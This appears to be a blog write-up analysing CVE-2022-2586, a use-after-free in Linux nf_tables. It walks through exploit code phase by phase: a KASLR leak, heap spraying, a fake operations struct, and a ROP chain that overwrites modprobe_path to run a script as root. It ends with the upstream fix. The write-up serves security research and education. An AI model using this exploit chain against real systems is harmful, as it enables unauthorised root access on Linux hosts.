The code uses execvp() to replace the current process image with UNSHARE_PATH, the path to the unshare utility, which re-runs the exploit (argv[0]) with the pipe descriptor as its argument. The -Urnm flags request a new user namespace with the current user mapped to root, plus new network and mount namespaces.
A new network namespace is needed because the vulnerability lives in nf_tables, and configuring nf_tables requires CAP_NET_ADMIN. An unprivileged user holds that capability inside a user and network namespace of their own, which makes the bug reachable without real root privileges.
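
The coordination between the two processes can be sketched in isolation. The following is a minimal illustration, not the exploit's code: run_handshake() is a hypothetical helper in which a forked watcher blocks on the read end of a pipe, the way the child above waits before calling launch_trigger(), while the other side reports an outcome on the write end. In the real exploit the write end survives execvp() and its number is passed along in argv[1]; here both sides stay in one program for brevity.

```c
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Hypothetical helper: fork a watcher that blocks on a pipe until the
 * other side reports the outcome. Returns the flag the watcher saw
 * (0 or 1), 2 if the watcher read nothing, or -1 on error.
 */
int run_handshake(int outcome)
{
	int pipefd[2];
	int status = 0;
	pid_t pid;

	if (pipe(pipefd) < 0)
		return -1;

	pid = fork();
	if (pid < 0) {
		close(pipefd[0]);
		close(pipefd[1]);
		return -1;
	}

	if (pid == 0) {
		/* Watcher: keep only the read end and wait for the flag. */
		int flag = 0;

		close(pipefd[1]);
		if (read(pipefd[0], &flag, sizeof(flag)) != (ssize_t)sizeof(flag))
			_exit(2);
		/* The real exploit would call launch_trigger() here. */
		_exit(flag ? 1 : 0);
	}

	/* Worker side: keep only the write end and report the result. */
	close(pipefd[0]);
	if (write(pipefd[1], &outcome, sizeof(outcome)) != (ssize_t)sizeof(outcome)) {
		close(pipefd[1]);
		waitpid(pid, &status, 0);
		return -1;
	}
	close(pipefd[1]);

	if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
		return -1;
	return WEXITSTATUS(status);
}
```

Calling run_handshake(1) returns 1 once the watcher has seen the success flag. run_handshake(0) returns 0, the case in which the real watcher would exit without launching anything.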

The exploitation code continues:

EXP_P:
	if(argc != 2)
		bye("[-] pipe fd not provided for namespace process");
	
	// Obtain the pipe file descriptor from the command line argument
	pipefd[1] = atoi(argv[1]);

	// Assign the process to a specific CPU core for heap shaping reliability
	assign_to_core(DEF_CORE);

	// Seed the random number generator
	srand(time(NULL));
	
	// Print a message indicating the start of the exploitation process
	puts("[*] Saving current state...");
	
	// Save the current state (likely the user-space register state needed to return from kernel mode later)
	save_state();

	/* ===================== [  Pre-cleanup ] ===================== */

	// Remove exploit tables left from other executions
	delete_table(TABLE_KLK_UAF_A);
	delete_table(TABLE_KLK_UAF_B);
	delete_table(TABLE_HLK_UAF_A);
	delete_table(TABLE_HLK_UAF_B);
	delete_table(TABLE_OBJ_SPRAY_A);
	delete_table(TABLE_RD_UAF_A);
	delete_table(TABLE_RD_UAF_B);
	delete_table(TABLE_RP_UAF_A);
	delete_table(TABLE_RP_UAF_B);

	/* ===================== [ Pre-Alloc ] ===================== */

	/*
		As a result of the table spraying, adding the traversing to add
		the hooking rule will turn slow, we create the objects for the
		last stage at the very beginning of the exploit.
	*/
	
	// Create objects for the last stage of the exploit
	create_uaf(TABLE_RP_UAF_A, TABLE_RP_UAF_B, OBJ_RP_UAF, SET_RP_UAF, OBJECT_TYPE_COUNTER, 0, NULL, 1);
	
	// Set up hook for the last stage
	set_up_hook(TABLE_RP_UAF_B, SET_RP_UAF, CHAIN_RP_UAF);

	/* ===================== [ Phase 1 - KASLR Leak ] ===================== */

	// Print a message indicating the start of Phase 1 - KASLR Leak
	puts("[i] Phase 1 - KASLR leak");

This part of the exploit prepares the environment: it removes tables left over from previous runs, pre-allocates the objects and the hook needed for the final stage, and then starts the first phase, which leaks a kernel address to defeat Kernel Address Space Layout Randomization (KASLR).
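
The body of assign_to_core() is not shown in this article. A plausible minimal version, assuming it relies on the Linux sched_setaffinity() call, is sketched below; pin_to_core() is a hypothetical name. Keeping the process on one CPU is commonly done in heap exploits because the kernel allocator keeps per-CPU free lists, so a chunk freed on one core is most likely to be handed out again on that same core.

```c
#define _GNU_SOURCE
#include <sched.h>

/* Hypothetical stand-in for assign_to_core(): pin the caller to one CPU. */
int pin_to_core(int core)
{
	cpu_set_t mask;

	if (core < 0 || core >= CPU_SETSIZE)
		return -1;

	CPU_ZERO(&mask);
	CPU_SET(core, &mask);

	/* A pid of 0 means "the calling thread". */
	return sched_setaffinity(0, sizeof(mask), &mask);
}
```

The function returns 0 on success and -1 on failure, so a caller can abort early when the requested core is not available to the process.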

From here onwards, the exploitation code is divided into 5 phases.

Phase 1: The developer is attempting to achieve a Kernel Address Space Layout Randomization (KASLR) leak during Phase 1 of the exploitation process.

/* ===================== [ Phase 1 - KASLR Leak ] ===================== */
puts("[i] Phase 1 - KASLR leak");

PHASE_1:
	puts("\t[*] Triggering UAF on nft_object struct...");
	// Create an nft_object with a user-controlled name for Use-After-Free (UAF) exploitation
	klk_obj_name = str_repeat('X', 0x20 - 2);
	create_uaf(TABLE_KLK_UAF_A, TABLE_KLK_UAF_B, klk_obj_name, SET_KLK_UAF, OBJECT_TYPE_COUNTER, 0, NULL, 0);
	
	// Start a thread to spray seq_operations structs
	pthread_create(&tx, NULL, (void *)spray_seq_op_loop, NULL);
	
	// Delete the table holding the referenced object to start seq_operations spraying
	delete_table(TABLE_KLK_UAF_A);
	puts("\t[*] Spraying with seq_operations structs...");

	// Wait for the thread to finish seq_operations spraying
	pthread_join(tx, &retval);
	
	// Parse the leaked address of the single_open() function
	so_leaked_addr = parse_uaf_obj_name_leak(TABLE_KLK_UAF_B, SET_KLK_UAF, 0x40 + 12, 0);
	if(so_leaked_addr == 0 || (so_leaked_addr & 0xffff000000000000) != 0xffff000000000000) {
		// Cleanup and exit if the single_open() leak failed
		delete_table(TABLE_KLK_UAF_B);
		bye("[-] single_open() leak failed!");
	}
	
	puts("\t[*] Cleaning up descriptors...");
	
	// Cleanup descriptors used in the seq_operations spraying
	for(int i = 0 ; i < MAX_FDS ; i++)
		close(fds[i]);
	
	// Print the leaked addresses, including KASLR base
	printf("\t[+] Leaked: single_open() @ 0x%lx\n", so_leaked_addr);
	
	// Calculate KASLR base address
	kaslr_base = so_leaked_addr - SINGLE_OPEN_OFF;
	
	// Print the leaked KASLR base address
	printf("\t[+] Leaked: KASLR base @ 0x%lx\n", kaslr_base);

	// Recalculate offsets for every address needed based on the new KASLR base
	recalculate_from_kaslr_base();
	
	// Print other leaked addresses
	printf("\t[+] Leaked: prepare_kernel_cred() @ 0x%lx\n", prepare_kernel_cred);
	printf("\t[+] Leaked: commit_creds() @ 0x%lx\n", commit_creds);
	
	// Cleanup (from phase 1)
	puts("\t[*] Cleaning up...");
	delete_table(TABLE_KLK_UAF_B);

UAF Triggering: The code creates an nft_object with a user-controlled name of 0x20 - 2 characters in one table and leaves a reference to it from a second table.
Seq_operations Spraying: A thread is created to spray the heap with seq_operations structs. seq_operations is the kernel structure of four function pointers (start, stop, next, show) behind the seq_file interface, so each instance is 32 bytes on x86-64 and is filled with kernel text addresses. The object name appears to be sized so that it falls into the same allocation size.
Freeing and Seq_operations Leaking: Deleting TABLE_KLK_UAF_A frees the object and its name while TABLE_KLK_UAF_B still refers to it. Once the spray has finished, the exploit reads the object name back through that stale reference and parses a kernel address, which it labels single_open(), out of the returned data.
Address Validation and Cleanup: The leaked value is accepted only if it is non-zero and its top 16 bits are all set, as expected of a kernel address on x86-64. On failure the exploit deletes TABLE_KLK_UAF_B and exits; on success it closes the descriptors used for the seq_operations spraying.
KASLR Base Calculation: The KASLR base address is calculated by subtracting the known offset of single_open() (SINGLE_OPEN_OFF) from its leaked address.
Recalculation and Printing: The addresses of the other symbols the exploit needs, including prepare_kernel_cred() and commit_creds(), are recalculated from the new KASLR base and printed.
Cleanup: The cleanup deletes the remaining table used for the UAF in Phase 1 (TABLE_KLK_UAF_B).
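
The spray itself is not shown in the excerpt. A common way to allocate seq_operations structs is to open a seq_file-backed file such as /proc/self/stat many times, and the sketch below assumes spray_seq_op_loop() does something similar. spray_open() and spray_close() are hypothetical names, and the path is a parameter so the helper can be tried on any readable file.

```c
#include <fcntl.h>
#include <unistd.h>

/*
 * Open `path` up to `count` times and store the descriptors in `fds`.
 * Returns how many descriptors were actually opened.
 */
int spray_open(const char *path, int *fds, int count)
{
	int opened = 0;

	while (opened < count) {
		int fd = open(path, O_RDONLY);

		if (fd < 0)
			break;
		fds[opened++] = fd;
	}
	return opened;
}

/* Close every descriptor from a previous spray_open() call. */
void spray_close(const int *fds, int opened)
{
	for (int i = 0; i < opened; i++)
		close(fds[i]);
}
```

Each descriptor keeps its kernel-side allocation alive until it is closed, which is why the exploit only closes fds[] after the leak has been parsed.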

Phase 1 of the exploit aims to leak the KASLR base address and adjust other offsets accordingly, providing the necessary information for subsequent stages of the exploitation process.
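
The arithmetic behind this phase is small enough to show on its own. The sketch below mirrors the validity check and the subtraction used in the code above; the function names are hypothetical, and the addresses in the usage note are made-up values, not offsets from any real kernel build.

```c
#include <stdint.h>

/* Top 16 bits set and non-zero: the same check the exploit applies. */
int looks_like_kernel_pointer(uint64_t addr)
{
	return addr != 0 &&
	       (addr & 0xffff000000000000ULL) == 0xffff000000000000ULL;
}

/* KASLR base = leaked symbol address - that symbol's static offset. */
uint64_t kaslr_base_from_leak(uint64_t leaked, uint64_t symbol_offset)
{
	return leaked - symbol_offset;
}

/* Any other symbol = KASLR base + its static offset. */
uint64_t rebase(uint64_t kaslr_base, uint64_t symbol_offset)
{
	return kaslr_base + symbol_offset;
}
```

For example, with an invented leak of 0xffffffff9a345670 and an invented offset of 0x345670, kaslr_base_from_leak() yields 0xffffffff9a000000, and rebase() with offset 0xc1d40 yields 0xffffffff9a0c1d40.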

Phase 2: The second phase, “Phase 2 - ctx->table leak”, reuses the same Use-After-Free (UAF). The goal is to get nft_object structures allocated over the freed object name, so that reading the name back leaks a pointer to ctx->table->objects and, from it, the address of ctx->table.

puts("[i] Phase 2 - ctx->table leak");

PHASE_2:

/*
   Our objective now is making nft_objects be allocated where our obj->key.name
   string was, right as we did for the KASLR leak phase.
   
   To do so, we need to provide a string of 0xc8 - 1 bytes for the object name.
   If we succeed, we will leak the first entry of one of the sprayed objects,
   which is obj->list.next, and this one points to &ctx->table->objects
*/

puts("\t[*] Triggering UAF on nft_object struct...");

// Allocate a string of 0xc8 - 1 bytes for the object name
hlk_obj_name = str_repeat('E', 0xc8 - 1);

// Create the cross-table reference, then delete the table that owns the object so that its name is freed
create_uaf(TABLE_HLK_UAF_A, TABLE_HLK_UAF_B, hlk_obj_name, SET_HLK_UAF, OBJECT_TYPE_LIMIT, 1, TABLE_OBJ_SPRAY_A, 0);
delete_table(TABLE_HLK_UAF_A);

puts("\t[*] Spraying with nft_object structs...");

// Spray nft_object structures so that one of them lands where hlk_obj_name was, then read it back through the stale reference
tbl_leaked_addr = spray_nft_object(TABLE_OBJ_SPRAY_A, 129, TABLE_HLK_UAF_B, SET_HLK_UAF);

// Check if the spray was successful and the leaked address is in the expected range
if(tbl_leaked_addr == 0 || (tbl_leaked_addr & 0xffff000000000000) != 0xffff000000000000) {
    delete_table(TABLE_HLK_UAF_B);
    delete_table(TABLE_OBJ_SPRAY_A);
    bye("[-] ctx->table leak failed!");
}

// Subtract the offset of the objects list head to get the base address of ctx->table
tbl_leaked_addr = tbl_leaked_addr - OFF_TO_OBJ_LST;

// Print the leaked addresses
printf("\t[+] Leaked: ctx->table (\"table3\") @ 0x%lx\n", tbl_leaked_addr);
printf("\t[+] Leaked: &ctx->table->objects (\"table3\") @ 0x%lx\n", tbl_leaked_addr + OFF_TO_OBJ_LST);

Objective: The objective is to get nft_object structures allocated in the memory that previously held the object name (hlk_obj_name). Reading the name through the stale reference then returns the first bytes of an nft_object.
UAF Triggering: The code creates an object named hlk_obj_name, keeps a reference to it from TABLE_HLK_UAF_B, and then deletes the owning table (TABLE_HLK_UAF_A), which frees the object and its name. This sets the stage for the subsequent spray.
Spraying nft_object: The code sprays the heap with nft_object structures in TABLE_OBJ_SPRAY_A, hoping that one of them reuses the freed name buffer.
Validation: It checks whether the spraying was successful and the leaked address is in the expected range. If not, the tables are deleted and the exploitation process is terminated.
Leaked Addresses: The leaked value is obj->list.next, which points to &ctx->table->objects. Subtracting OFF_TO_OBJ_LST gives the address of ctx->table itself. Finally, both addresses are printed.

Before UAF Triggering:
+--------------------------+
| hlk_obj_name (freed)     |
+--------------------------+
| ...                      |
|                          |
+--------------------------+
After UAF Triggering and nft_object Spray:
+--------------------------+
| nft_object structures    |
| (allocated in freed      |
| memory location)         |
+--------------------------+
| ...                      |
|                          |
+--------------------------+
| ctx->table->objects      |
+--------------------------+

The goal is to manipulate memory allocation to reveal the addresses of ctx->table and ctx->table->objects.
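
The step from the leaked list pointer back to the table is the familiar "subtract the field offset" trick. The sketch below uses a hypothetical demo_table layout, not the real struct nft_table, purely to show what the subtraction of OFF_TO_OBJ_LST accomplishes.

```c
#include <stddef.h>
#include <stdint.h>

/* Doubly linked list node, shaped like the kernel's struct list_head. */
struct list_node {
	struct list_node *next;
	struct list_node *prev;
};

/* Hypothetical table layout; only the position of `objects` matters. */
struct demo_table {
	struct list_node list;
	struct list_node chains;
	struct list_node sets;
	struct list_node objects;
	uint64_t handle;
};

/* Recover the table base from a leaked pointer to its `objects` head. */
uint64_t table_from_objects_head(uint64_t leaked_head)
{
	return leaked_head - offsetof(struct demo_table, objects);
}
```

In the exploit the offset is a constant chosen for the target kernel; here offsetof() computes it from the toy layout, which keeps the example independent of any particular kernel version.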

Phase 3: This phase sets up an arbitrary read primitive and uses it to leak the value stored in ctx->table->objects.next, which is the address of one of the sprayed nft_objects.

/* ===================== [ Phase 3 - ctx->table->objects.next leak ] ===================== */

puts("[i] Phase 3 - ctx->table->objects.next leak");

sleep(1.2);

PHASE_3:

/*
   At this point, we have a known address of an address where we can store contents by
   spraying, which is exactly what we need for a fake nft_object_ops struct residing in
   the kernel heap.
   
   To retrieve this address, we can prepare another UAF condition and take over the
   contents of the nft_object, use nla_memdup() spraying through table creation to
   replace its contents and place in obj->key.name an arbitrary address. This way,
   we get a full arbitrary read primitive, allowing us to read bytes at any known
   valid address. We are, however, a bit limited in that this pointer is treated as
   a string pointer, and we will be able to read until a null terminator is found.
   
   Using this arbitrary read primitive, we will read the contents of &ctx->table->objects
   which is ctx->table->objects.next, and the address contained there is the address of
   one of the nft_objects we used to spray.
*/

sp_d = calloc(0xc8, sizeof(char));
if(!sp_d)
    bye("[-] Error at calloc()");
sp_d_l = (uint64_t *)sp_d;

memset(sp_d, 'A', 0xc8);

/* obj->key-name entry */
sp_d_l[4] = (tbl_leaked_addr + OFF_TO_OBJ_LST) + 1; // "+ 1" because first byte will be null

puts("\t[*] Triggering UAF on nft_object struct...");
create_uaf(TABLE_RD_UAF_A, TABLE_RD_UAF_B, OBJ_RD_UAF, SET_RD_UAF, OBJECT_TYPE_COUNTER, 0, NULL, 0);
delete_table(TABLE_RD_UAF_A);
spray_memdup(sp_d, 0xc8, 2048);

sleep(1);

obj_leaked_addr = parse_uaf_obj_name_leak(TABLE_RD_UAF_B, SET_RD_UAF, 0x40 + 8, 1);
if(obj_leaked_addr == 0 || (obj_leaked_addr & 0xffff000000000000) != 0xffff000000000000) {
    puts("[-] *ctx->table->objects leak failed!");
    goto FINAL_CLEANUP;
}

printf("\t[+] Leaked: ctx->table->objects.next @ 0x%lx\n", obj_leaked_addr);

/* ===================== [ Phase 4 - Craft fake nft_object_ops struct ] ===================== */

puts("[i] Phase 4 - Craft fake nft_object_ops struct");

Memory Allocation: The code allocates a 0xc8-byte buffer (sp_d) to hold the contents used for the spraying and fills it with 'A' bytes.
Setting Up Arbitrary Read Primitive: The code writes the address to read from into the slot that overlaps obj->key.name (sp_d_l[4]). The address is tbl_leaked_addr + OFF_TO_OBJ_LST + 1: the + 1 skips the lowest byte of the pointer stored there, which the exploit expects to be zero and which would otherwise end the string read immediately.
Triggering Use-After-Free (UAF): The code sets up another cross-table reference with create_uaf and then frees the referenced object by deleting its table with delete_table.
Spraying Memory with nla_memdup(): The code sprays memory with copies of sp_d using the spray_memdup function, so that one copy replaces the freed nft_object.
Parsing UAF Object Name Leak: It reads the object name back with parse_uaf_obj_name_leak, which now follows the planted pointer, and checks whether the leak was successful. If so, it prints the leaked address.
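
Both halves of the read primitive, planting the pointer and rebuilding the value that comes back, can be sketched as follows. This is an illustration under assumptions: the function names are hypothetical, the slot index and buffer size are taken from the code above, and the shift-by-one-byte decoding is what the "+ 1" trick implies rather than a copy of parse_uaf_obj_name_leak().

```c
#include <stdint.h>
#include <string.h>

#define FAKE_OBJ_SIZE 0xc8	/* buffer size used by the exploit */
#define NAME_SLOT     4		/* qword index written by the exploit */

/* Fill the fake object with filler and plant the address to read from. */
void build_read_payload(unsigned char *buf, uint64_t target)
{
	uint64_t name_ptr = target + 1;	/* skip the expected zero low byte */

	memset(buf, 'A', FAKE_OBJ_SIZE);
	memcpy(buf + NAME_SLOT * sizeof(uint64_t), &name_ptr, sizeof(name_ptr));
}

/*
 * Rebuild a 64-bit pointer from the bytes read at target + 1.
 * `bytes` holds bytes 1..7 of the little-endian pointer; byte 0 is
 * assumed to be zero.
 */
uint64_t decode_shifted_leak(const unsigned char *bytes, size_t len)
{
	uint64_t value = 0;

	for (size_t i = 0; i < len && i < 7; i++)
		value |= (uint64_t)bytes[i] << (8 * (i + 1));
	return value;
}
```

Because the pointer is read as a string, a zero byte anywhere in the middle of the address would truncate the leak. This is the limitation the exploit's own comment mentions.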

+--------------------------------------------+
| Phase 3 - UAF                              |
| (Arbitrary Read)                           |
+--------------------------------------------+
                      |
                      V
+--------------------------------------------+
| Memory Allocation                          |
| and Setup of                               |
| Arbitrary Read                             |
+--------------------------------------------+
                      |
                      V
+--------------------------------------------+
| Triggering UAF                             |
| and Cleaning Up                            |
+--------------------------------------------+
                      |
                      V
+--------------------------------------------+
| Memory Spraying                            |
| with nla_memdup                            |
+--------------------------------------------+
                      |
                      V
+--------------------------------------------+
| Parsing UAF Leak                           |
| and Verification                           |
+--------------------------------------------+
                      |
                      V
+--------------------------------------------+
| Print Leaked Address (obj_leaked_addr)     |
+--------------------------------------------+
                      |
                      V
+--------------------------------------------+
| Phase 4 - Craft fake nft_object_ops struct |
+--------------------------------------------+

Phase 4: In the fourth phase, the developer frees the previously sprayed nft_object structs by deleting their table (TABLE_OBJ_SPRAY_A), then reclaims that memory with attacker-controlled data that will serve as a fake nft_object_ops struct.

PHASE_4:
	/*
	   We know the address of an object for which we can control its contents. We need now
	   to achieve this last by deleting the table where these objects reside, to then spray
	   with nla_memdup() allocations as a result of table creation. This way we can place
	   any contents we want in these objects, and we know for certain one of them will be
	   the one for which we know the address.
	   
	   As a result, we will predict that in a specific known heap address there will be
	   a fake nft_object_ops struct, which we will use in the next phase for obj->ops->eval
	   function pointer hijacking.
	*/
	
	// Print a message indicating the start of Phase 4
	puts("\t[*] Freeing sprayed nft_object structs...");
	
	// Delete the table where the objects reside, creating space for new allocations
	delete_table(TABLE_OBJ_SPRAY_A);
	
	// Allocate memory for spraying with nla_memdup() allocations
	sp2_d = calloc(0xc8, sizeof(char));
	if(!sp2_d)
		bye("[-] Error at calloc()");
	sp2_d_l = (uint64_t *)sp2_d;
	
	// Fill every 8-byte slot of the new buffer with the stack pivot gadget address
	for(int i = 0 ; i < (0xc8 / sizeof(uint64_t)) ; i++)
		sp2_d_l[i] = stack_pivot_addr; // push rdi ; pop rsp ; add cl, cl ; ret
	
	// Print a message indicating the start of memory spraying
	puts("\t[*] Spraying with nla_memdup() allocations to craft fake nft_object_ops struct...");
	
	// Perform the memory spraying with nla_memdup()
	spray_memdup(sp2_d, 0xc8, 4096);
	
	/* Cleanup (from phase 2, 3, 4) */
	
	// Clean up tables used in previous phases
	puts("\t[*] Cleaning up...");
	delete_table(TABLE_RD_UAF_B);
	delete_table(TABLE_HLK_UAF_B);
	
	// Print a message indicating the completion of Phase 4
	puts("\t[+] Fake nft_object_ops struct should be in target memory!");
	
	/* ===================== [ Phase 5 - Code execution ] ===================== */
	
	// Print a message indicating the start of Phase 5
	puts("[i] Phase 5 - Code execution (ROP)");
	
	// Pause for 2 seconds (sleep)
	sleep(2);

New memory (sp2_d) is allocated for the subsequent memory spraying.
Every 8-byte slot of the buffer is filled with the address of a stack pivot gadget, and the buffer is sprayed through nla_memdup() allocations. Whichever copy lands on the known heap address acts as a fake nft_object_ops struct in which every function pointer, including eval, points to the pivot.
Cleanup operations are performed to clean up tables used in previous phases (TABLE_RD_UAF_B and TABLE_HLK_UAF_B).
A message is printed indicating that the fake nft_object_ops struct should now be in the target memory.
The program then announces Phase 5 (Code execution) and pauses for 2 seconds.
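
Filling the whole buffer with one value is what makes the fake struct robust: whatever the offset of eval inside nft_object_ops happens to be, the pointer read from that offset is the pivot. A minimal sketch of that fill, with a hypothetical helper name and an invented gadget address in the usage note:

```c
#include <stddef.h>
#include <stdint.h>

/*
 * Write `value` into every 8-byte slot of a buffer of `len` bytes.
 * Returns the number of slots written.
 */
size_t fill_qwords(uint64_t *slots, size_t len, uint64_t value)
{
	size_t count = len / sizeof(uint64_t);

	for (size_t i = 0; i < count; i++)
		slots[i] = value;
	return count;
}
```

For the 0xc8-byte buffer used here this writes 25 slots. The gadget itself (push rdi ; pop rsp) copies the first argument register into the stack pointer; assuming eval is called with the nft_object pointer as its first argument, execution then continues on data stored inside the object, which is where Phase 5 places the ROP chain.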

+-------------------------+             +-------------------------+
|     TABLE_OBJ_SPRAY_A   |             |                         |
|-------------------------|             |                         |
|   nft_object 1          |             |                         |
|   nft_object 2          |             |         Heap            |
|   ...                   |    Phase 4  |                         |
|   nft_object n          |  ---------->|   +-----------------+   |
+-------------------------+             |   |   Fake          |   |
          |                             |   |   nft_object_ops|   |
          |                             |   |   (Crafted)      |  |
          V                             |   +-----------------+   |
          +-------------------------+   |                         |
                                        |                         |
                                        +-------------------------+

Phase 4 involves freeing existing nft_object structs, creating space in the heap, and then spraying memory with a crafted fake nft_object_ops struct. This crafted structure will be utilized in the subsequent Phase 5 for code execution (ROP).

Phase 5: The developer now triggers the Use-After-Free (UAF) on the objects created during the pre-allocation step. They allocate memory for a Return-Oriented Programming (ROP) chain, spray this chain using nla_memdup() allocations so that one copy replaces the freed nft_object, and then generate network traffic that hits the hook and uses the stale object. The ROP chain overwrites modprobe_path, ultimately leading to the execution of a custom script as root.

PHASE_5:
	/*
	   Finally, trigger UAF on the objects created at the very
	   beginning of the exploit.
	*/
	
	// Delete the table that owns the object created during pre-allocation; TABLE_RP_UAF_B still references it
	delete_table(TABLE_RP_UAF_A);
	
	// Allocate memory for a ROP chain
	rop_d = calloc(0xc8, sizeof(char));
	if(!rop_d)
		bye("[-] Error at calloc()");
	rop_d_l = (uint64_t *)rop_d;
	
	/*
	   We build a ROP chain in these sprayed nla_memdup()
	   allocations, with the hope that one of them ends up
	   taking the chunk previously used by the nft_object,
	   and for which we still keep a reference.
	   
	   The ROP chain will use a write-what-where gadget to
	   write our custom usermode helper for modprobe_path,
	   allowing us to execute a custom script as root.
	   
	   Finally, we reach the KPTI trampoline for returning
	   to the userland.
	*/

	// Populate the ROP chain with specific values and gadgets
	rop_d_l[0] = pop_rdx_ret; 			// pop rdx ; ret
	rop_d_l[1] = modprobe_path;			// modprobe_path
	rop_d_l[2] = pop_rax_ret;			// pop rax ; ret
	rop_d_l[3] = 0x782f706d742f;			// "/tmp/x\x00\x00"
	rop_d_l[4] = mov_qptr_rdx_rax_ret;		// mov qword ptr [rdx], rax ; ret
	rop_d_l[5] = kpti_trampoline;			// swapgs_restore_regs_and_return_to_usermode + 22
	// ... (continued population of the ROP chain)

	// Spray the ROP chain using nla_memdup() allocations
	puts("\t[*] Spraying with nla_memdup() allocations containing ROP chain...");
	spray_memdup(rop_d, 0xc8, 4096);
	
	// Trigger the network hook to exploit the UAF condition
	puts("\t[*] Triggering network hook...");
	system("ip link set dev lo up");  // Prevent problems with socket creation

	// Set up a server in a new process
	sfd = fork();
	if(sfd == 0) {
		setup_trig_server();
		exit(0);
	}
	
	// Trigger the network hook for the UAF-referenced object
	cfd = fork();
	if(cfd == 0) {
		trig_net_sock();
		exit(0);
	}
	
	// Signal success to the helper process waiting outside the namespace
	is_success = 1;
	r = write(pipefd[1], &is_success, sizeof(int));
	if(r < 0)
		return 1;
	
	sleep(10);
	
	/* ===================== [ Cleanup ] ===================== */

FINAL_CLEANUP:
	kill(cfd, SIGKILL);
	kill(sfd, SIGKILL);
	close(fd);
	delete_table(TABLE_RP_UAF_B);
	cleanup_spray_tables();
	return 0;

Here’s a simplified flow diagram:

   +------------------------+
   |    PHASE_5: Exploit    |
   +------------------------+
               |
       +-------v--------+
       |  Delete Table  |
       +-------|--------+
               |
       +-------v--------+
       |  ROP Chain     |
       +-------|--------+
               |
       +-------v--------+
       |  Spray Memory  |
       +-------|--------+
               |
       +-------v--------+
       | Trigger UAF    |
       +-------|--------+
               |
       +-------v--------+
       |   Network      |
       |   Exploitation |
       +-------|--------+
               |
       +-------v--------+
       |   Final         |
       |   Cleanup       |
       +-------|--------+
               |
               v
            [Exit]
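
One detail of the ROP chain worth spelling out is the constant 0x782f706d742f loaded into rax. It is simply the string "/tmp/x" packed into a 64-bit value in little-endian byte order, so that a single 8-byte write replaces the start of modprobe_path and the two zero upper bytes terminate the string. The helper below is a hypothetical illustration of that packing.

```c
#include <stdint.h>
#include <string.h>

/* Pack up to 8 bytes of `s` into a qword, first character in the low byte. */
uint64_t pack_le64(const char *s)
{
	uint64_t value = 0;
	size_t len = strlen(s);

	if (len > sizeof(value))
		len = sizeof(value);
	for (size_t i = 0; i < len; i++)
		value |= (uint64_t)(unsigned char)s[i] << (8 * i);
	return value;
}
```

pack_le64("/tmp/x") returns 0x782f706d742f, matching the value in rop_d_l[3]. A path longer than seven characters would need more than one write, because no room would be left for the terminating zero byte.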

Patch Diffing

The issue was addressed upstream in the following commit: https://github.com/torvalds/linux/commit/95f466d22364a33d183509629d0879885b4f547e

When looking for chains by ID, use the table that was used for the lookup by name, and only return chains belonging to that same table.
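
The idea behind the fix can be modelled in a few lines of user-space C. This is a toy sketch, not the kernel code: demo_table, demo_chain and both lookup functions are hypothetical stand-ins that only contrast "match on ID alone" with "match on ID and owning table".

```c
#include <stddef.h>
#include <stdint.h>

/* Toy stand-ins for nf_tables structures; not the kernel definitions. */
struct demo_table {
	const char *name;
};

struct demo_chain {
	const struct demo_table *table;	/* table that owns this chain */
	uint32_t id;			/* ID assigned within the transaction */
};

/* Unpatched idea: any chain with a matching ID is returned. */
const struct demo_chain *lookup_id_unpatched(const struct demo_chain *chains,
					     size_t count, uint32_t id)
{
	for (size_t i = 0; i < count; i++)
		if (chains[i].id == id)
			return &chains[i];
	return NULL;
}

/* Patched idea: the chain must also belong to the table being used. */
const struct demo_chain *lookup_id_patched(const struct demo_chain *chains,
					   size_t count,
					   const struct demo_table *table,
					   uint32_t id)
{
	for (size_t i = 0; i < count; i++)
		if (chains[i].id == id && chains[i].table == table)
			return &chains[i];
	return NULL;
}
```

With a chain of ID 7 owned by table "a", the unpatched lookup returns it regardless of which table asked, while the patched lookup returns NULL when the request comes from table "b". Refusing the cross-table match removes the dangling reference that the exploit depends on.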

Final Thoughts

Analyzing CVE-2022-2586 has been an illuminating experience. Delving into the Use-After-Free caused by cross-table references in nf_tables, understanding its implications, and studying the fix has deepened my understanding of the nf_tables.ko module and of Use-After-Free exploitation.

Furthermore, I would like to acknowledge @lockedbyte for the remarkable contribution of crafting an exploit for the vulnerability. The exploit not only provides a practical demonstration of the vulnerability but also enabled me to test and confirm that it exists.

I trust that reading this account was as delightful for you as it was for me to craft it.

There can also be multiple ways to exploit the vulnerability. This exploit assumes that a particular address is consistently mapped in kernel space, which is not universally guaranteed. Consequently, the exploit’s reliability is not absolute, yet it has a commendable success rate. Another challenge is that a kernel panic occurs once the exploit completes. To mitigate this, efforts are underway to identify objects that can persist in kernel memory after the exploitation process ends. This requires thorough experimentation with different heap placements, but it is a worthwhile task.